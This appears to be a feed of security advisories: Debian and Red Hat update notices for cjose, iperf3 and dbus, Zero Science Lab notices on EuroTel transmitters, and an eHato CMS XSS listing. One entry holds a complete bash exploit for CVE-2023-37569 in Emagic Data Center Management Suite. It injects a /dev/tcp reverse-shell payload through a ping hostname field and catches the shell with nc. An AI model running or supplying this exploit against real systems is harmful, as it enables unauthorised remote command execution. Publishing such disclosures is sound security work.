Debian Linux Security Advisory 5472-1 - It was discovered that an incorrect implementation of AES GCM decryption in cjose, a C library implementing the JOSE standard may allow an attacker to provide a truncated Authentication Tag and modify the JWE object.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5472-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 08, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : cjose  
CVE ID         : CVE-2023-37464  
Debian Bug     : 1041423

It was discovered that an incorrect implementation of AES GCM decryption  
in cjose, a C library implementing the JOSE standard may allow an attacker  
to provide a truncated Authentication Tag and modify the JWE object.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 0.6.1+dfsg1-1+deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 0.6.2.1-1+deb12u1.

We recommend that you upgrade your cjose packages.

For the detailed security status of cjose please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/cjose

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTSlQcACgkQEMKTtsN8  
TjZCgw//ajZImjIQAbYdWOQPQCn4rrHu3FOcoyuHUluEZhiziZxEcsO+kSCDJBqa  
e6LDuKC5B3uvA4UQcfXPbi2QqdQGbMBE8chmHqqOL6ia86VJhUBU7USu+PVpVn1k  
Qf8SWtHGC/7OijpbJA0KQT99GKLrQI3z1maKjxT9t9OiYd7v1leuXIHd0G/fBeR+  
aSimNdY5vTfdXJMreUopCxiyyiKIXjBzC1rct3/yxCqfPpw0WUmsXq4CcY0F6v0U  
zpFOiHPHDwUwPfshPs6mNZRlDqnANLYunKn9Cs9c2ZYwCgNqs6CU8NYEXAuqLOCl  
xCxMF1wq96nKl1RVHFP3xdp3LP0CL8Gnvm6sQ9lnzThrEnm+1bNo3Zfq4CpykSo2  
FAwV56miW2G8cyBXPLAQRW9237AZw7mGovxckEgF6gmV/Q2Hn4DXBDC231cCsjhY  
JFWB45zAKIqP3Y+ZntugJF8Tjipb3LxuJcxCu2GCaAL35tp/+T+8k6QFmcSGDz0J  
QpWZArFmnejyjddctAUkWJQD1CPZbp+EUxZZbgG0QeSdiLQqqNPXXxtCVpWbnzyX  
+0JkKD0f/3+bRv0vokbWgtN5EAvJR+2au29Jb/xVwE4dgXdS/yVqLndaBkbHxsJ2  
tPoleid7Qij4yFvXDjrTcjH7LN61UF1Q5prZNBKnFA3uUtNPbJ4=  
=3VDm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5472-1

Red Hat Security Advisory 2023-4571-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4571-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4571  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
iperf3-3.9-10.el9_2.src.rpm

aarch64:  
iperf3-3.9-10.el9_2.aarch64.rpm  
iperf3-debuginfo-3.9-10.el9_2.aarch64.rpm  
iperf3-debugsource-3.9-10.el9_2.aarch64.rpm

ppc64le:  
iperf3-3.9-10.el9_2.ppc64le.rpm  
iperf3-debuginfo-3.9-10.el9_2.ppc64le.rpm  
iperf3-debugsource-3.9-10.el9_2.ppc64le.rpm

s390x:  
iperf3-3.9-10.el9_2.s390x.rpm  
iperf3-debuginfo-3.9-10.el9_2.s390x.rpm  
iperf3-debugsource-3.9-10.el9_2.s390x.rpm

x86_64:  
iperf3-3.9-10.el9_2.i686.rpm  
iperf3-3.9-10.el9_2.x86_64.rpm  
iperf3-debuginfo-3.9-10.el9_2.i686.rpm  
iperf3-debuginfo-3.9-10.el9_2.x86_64.rpm  
iperf3-debugsource-3.9-10.el9_2.i686.rpm  
iperf3-debugsource-3.9-10.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qOVAAoJENzjgjWX9erEim4P/j6cppYdQK2YOr+UfsZow0nS  
xe2B2YZzu4wDh9Ps+oe+mtiBccjAZp328N6+x18BDO3iKctF1dgmHRDkwe95IaZk  
kmOtEaUX7VTgHteDae2xDTtJ8cttD2EqVPZgflq4pHqo5N8YtMeRvE/1+dT0Ms8d  
TJIcdEXK6EMLDQYs+E+EB5uQRcV0ySd3eKLJXGOidfMXkmV1bQ7AxIDaTOZU+5pe  
bxfZJqkkTrVJcoP0oadmIGNPBVb7t0FdZjZg3JtDb3xA4fB/Vx6cCdbZNrotl4SX  
XQF29x9GnYYLx5tDgd6iImRH49oPjSGxji1iUuALN74mdvtrn6tPenrjOvSwcosW  
a5EFOoyP3asoaXyUkcL6OTfFBgMJQE+L2thIsh7Vror24ZeUG0R44mLhyA/wQDyq  
oj8LDGJa645EwuuYTlruXDkRX41XolwWD2mfiB7X+fZM8VNoOhgaDiueLw/zBhEB  
sD+gV09yMLJbuMtcuQhWOjBd8Y4CCzFsdwmD7kPqvBgRoNeOsXuu4nNYYbYi45+W  
H0uvSxjaIKgI3GL4PGRgwkMIp6xS2NSDtJbnbx9V7F0CVw1WLAQ41mIN4TA2I3Sa  
+Nrgj1PMgXWu+w2aq5ykyRrrLwknGD8Hy9iSNQjllXO6MRaSEhFsVVo2BWsQYSEL  
B6Dem0aaLAGpNJ7qV1lS  
=gW6k  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4571-01

Emagic Data Center Management Suite version 6.0 suffers from a remote command execution vulnerability.

# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection  
# Date: 03-08-2023  
# Exploit Author: Shubham Pandey & thewhiteh4t  
# Vendor Homepage: https://www.esds.co.in/enlight360  
# Version: 6.0.0  
# Tested on: Kali Linux  
# CVE : CVE-2023-37569

URL=$1  
LHOST=$2  
LPORT=$3

echo "*****************************"  
echo "*  ESDS eMagic 6.0.0 RCE    *"  
echo "*  > CVE-2023-37569         *"  
echo "*  > Shubham & thewhiteh4t  *"  
echo "*****************************"

if [ $# -lt 3 ]; then  
    echo """  
USAGE :

./exploit.sh http://<IP> <LHOST> <LPORT>  
./exploit.sh http://192.168.0.10 192.168.0.20 1337  
"""  
    exit 1  
fi

url="$1/index.php/monitor/operations/utilities/"

echo "[+] URL   : $URL"  
echo "[+] LHOST : $LHOST"  
echo "[+] LPORT : $LPORT"  
echo

payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"

post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"

echo "[!] Triggering exploit..."

echo $url

(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &

echo "[+] Catching shell..."  
nc -lvp 4444

Emagic Data Center Management Suite 6.0 Remote Command Execution

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

Title: EuroTel EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability  
Advisory ID: ZSL-2023-5784  
Type: Local/Remote  
Impact: Security Bypass, Exposure of System Information, Exposure of Sensitive Information, System Access, DoS, Privilege Escalation  
Risk: (5/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter suffers from an unauthenticated configuration and log download vulnerability. This will enable the attacker to disclose sensitive information and help him in authentication bypass, privilege escalation and full system access.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_config.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Unauthenticated Config/Log Download Vulnerability

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

Title: EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)  
Advisory ID: ZSL-2023-5783  
Type: Local/Remote  
Impact: Privilege Escalation, Security Bypass  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_idor.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Authorization Bypass (IDOR)

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

Title: EuroTel ETL3100 Transmitter Default Credentials  
Advisory ID: ZSL-2023-5782  
Type: Local/Remote  
Impact: System Access, Exposure of System Information, Exposure of Sensitive Information  
Risk: (4/5)  
Release Date: 09.08.2023

**Summary**

RF Technology For Television Broadcasting Applications. The Series ETL3100 Radio Transmitter provides all the necessary features defined by the FM and DAB standards. Two bands are provided to easily complain with analog and digital DAB standard. The Series ETL3100 Television Transmitter provides all the necessary features defined by the DVB-T, DVB-H, DVB-T2, ATSC and ISDB-T standards, as well as the analog TV standards. Three band are provided to easily complain with all standard channels, and switch softly from analog-TV 'world' to DVB-T/H, DVB-T2, ATSC or ISDB-T transmission.

**Description**

The TV and FM transmitter uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system.

**Vendor**

EuroTel S.p.A. - https://www.eurotel.it  
SIEL, Sistemi Elettronici S.R.L - https://www.siel.fm

**Affected Version**

v01c01 (Microprocessor: socs0t10/ats01s01, Model: ETL3100 Exciter)  
v01x37 (Microprocessor: socs0t08/socs0s08, Model: ETL3100RT Exciter)

**Tested On**

GNU/Linux Ubuntu 3.0.0+ (GCC 4.3.3)  
lighttpd/1.4.26  
PHP/5.4.3  
Xilinx Virtex Machine

**Vendor Status**

N/A

**PoC**

sielfm\_creds.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[09.08.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

EuroTel ETL3100 Transmitter Default Credentials

Red Hat Security Advisory 2023-4569-01 - D-Bus is a system for sending messages between applications. It is used both for the system-wide message bus service, and as a per-user-login-session messaging facility.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: dbus security update  
Advisory ID:       RHSA-2023:4569-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4569  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-34969   
=====================================================================

1. Summary:

An update for dbus is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

D-Bus is a system for sending messages between applications. It is used  
both for the system-wide message bus service, and as a  
per-user-login-session messaging facility.

Security Fix(es):

* dbus: dbus-daemon: assertion failure when a monitor is active and a  
message from the driver cannot be delivered (CVE-2023-34969)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all running instances of dbus-daemon and all  
running applications using the libdbus library must be restarted, or the  
system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2213166 - CVE-2023-34969 dbus: dbus-daemon: assertion failure when a monitor is active and a message from the driver cannot be delivered

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
dbus-daemon-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-devel-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm

ppc64le:  
dbus-daemon-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-devel-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm

s390x:  
dbus-daemon-1.12.20-7.el9_2.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.s390x.rpm  
dbus-devel-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.s390x.rpm

x86_64:  
dbus-daemon-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.i686.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-devel-1.12.20-7.el9_2.1.i686.rpm  
dbus-devel-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
dbus-1.12.20-7.el9_2.1.src.rpm

aarch64:  
dbus-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.aarch64.rpm

noarch:  
dbus-common-1.12.20-7.el9_2.1.noarch.rpm

ppc64le:  
dbus-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.ppc64le.rpm

s390x:  
dbus-1.12.20-7.el9_2.1.s390x.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-1.12.20-7.el9_2.1.s390x.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-1.12.20-7.el9_2.1.s390x.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.s390x.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.s390x.rpm

x86_64:  
dbus-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-daemon-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.i686.rpm  
dbus-debugsource-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-libs-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tests-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-tools-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.i686.rpm  
dbus-x11-debuginfo-1.12.20-7.el9_2.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-34969  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qOIAAoJENzjgjWX9erEqicP/Aghm295i1cVKdG1tSNj7isd  
i9i2+4kzWpNH4jMEwJHGE9Zf5sbkuEo2v+M32CSKXo+ahIt/ZoXV7VNXiUWPAdWF  
80Y3kW3YKLXg1a0MqZurVmBz4bj+Pf9bHK+PoRqyr0R+PmDsNvURMyGwAdmkP5e5  
qCEZKC3wD0m6cEQR6+CFmw1umc7klvCrzDMDfkBTkT6LHd0L3kx/CdKAhmaD90Wp  
YyetYsNWX37iBXUYcjK0VNQqiwz3RMMpemZMXMo4v/C4CVVR6cABxnR2YpONy4KW  
uD2mx84M3gcvSuameqISkw7+QizY/lquA87zPXu/IwskraWzpfpDtQV0SdeSRbni  
DVsEC7i0OX/7f9uX3bYQXt6evCN5TUzpAFLnJmauPFBuq5+5l3PZXHGTecYJ9ANV  
JS2RYkCeTKAojeC/QAedKB6nDsg4NYlyK/9DCcbU5ERvAPOT0rsdxMTlcyXkI4TB  
ATz7zcKJWj1EJvaZZk00+jwwp07g7e0hvhyJqsJazfHaD9djOG0tNoYFG3gQNSCk  
/ifzbPaHepW6TOayqLOEFN+9A6XuJNDAgF6AOY77qCzSIlJa3wTDWaSUJiQsLhDu  
deDOjWl/Qjtm+AbNhmuKmnzeOPvnl78xwMazmx7P7GR29s7gfApt6Jebyfbo5YnI  
SlSOCtfoIWe4qbvVZcp8  
=8vma  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4569-01

Red Hat Security Advisory 2023-4570-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4570-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4570  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
iperf3-3.5-7.el8_8.src.rpm

aarch64:  
iperf3-3.5-7.el8_8.aarch64.rpm  
iperf3-debuginfo-3.5-7.el8_8.aarch64.rpm  
iperf3-debugsource-3.5-7.el8_8.aarch64.rpm

ppc64le:  
iperf3-3.5-7.el8_8.ppc64le.rpm  
iperf3-debuginfo-3.5-7.el8_8.ppc64le.rpm  
iperf3-debugsource-3.5-7.el8_8.ppc64le.rpm

s390x:  
iperf3-3.5-7.el8_8.s390x.rpm  
iperf3-debuginfo-3.5-7.el8_8.s390x.rpm  
iperf3-debugsource-3.5-7.el8_8.s390x.rpm

x86_64:  
iperf3-3.5-7.el8_8.i686.rpm  
iperf3-3.5-7.el8_8.x86_64.rpm  
iperf3-debuginfo-3.5-7.el8_8.i686.rpm  
iperf3-debuginfo-3.5-7.el8_8.x86_64.rpm  
iperf3-debugsource-3.5-7.el8_8.i686.rpm  
iperf3-debugsource-3.5-7.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0qNaAAoJENzjgjWX9erEoW4P/3bPOtStFGt+KJqM32Dii0JP  
2thyH5EtuzidhUmQbLtRz5IzBBfbMu8FbjxOlDmMQeMh5NwQYJUf9E6Cl1LIBvAD  
qrCbvlRrTJWEf6ZVkBaRjl+jLDbgW1mrF5GoXo8l1Ebv4wrgSkMAV5rQfqdYy7k2  
pVMfaC1vjyNSR5rUgZwULudjLuihvndj44VXqB7QIDDyFosO2YdKjpTcc/Syqp6H  
ohmPkLX2WEoWKB98zeRFI71Hh7L0HoRcl0uXiV0DHrGAj5ObeoLO5+FAiQIWSDBg  
2XDjFJjmBu2d5KjkjQuH4RqVTxLe2Z1izL5FAXYW1fT+n4KL6xXdRK1i+BoVIeg1  
0+YFUg17J2pgQlDDA5YWLv1XVKIrf9GHLFo41pBgUSm03XsHXG80D1BljYXlPFAH  
e7b9bA0Onz1siKkXCT+7d7mBXjPpM4yQlcz20HY01it3zWBeOOX8Xfd8SzRy5SSc  
H58rXuExRrE8rub3XMi0qzutZj8Pc6/ftPDLzlQhfqsJvzxx+49rLKPGymNjBe3a  
zJ8WjSQMDKym0JqOOTaneuSd6qABHxGyFBdzMoNNpbfK2hQgcDT1NOkH53CuQTqy  
ZGpUn/Frd1RGO5GMmDpYr+knXZ7/2Z30xGiakLqpS9ruZ/y8BfbnAWidhfHCPR0b  
SsmhU0hyjcD7cv8zFvcO  
=RGFP  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4570-01

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

**eHato CMS 1.0 Cross Site Scripting**

Posted Aug 9, 2023

Authored by indoushka

eHato CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

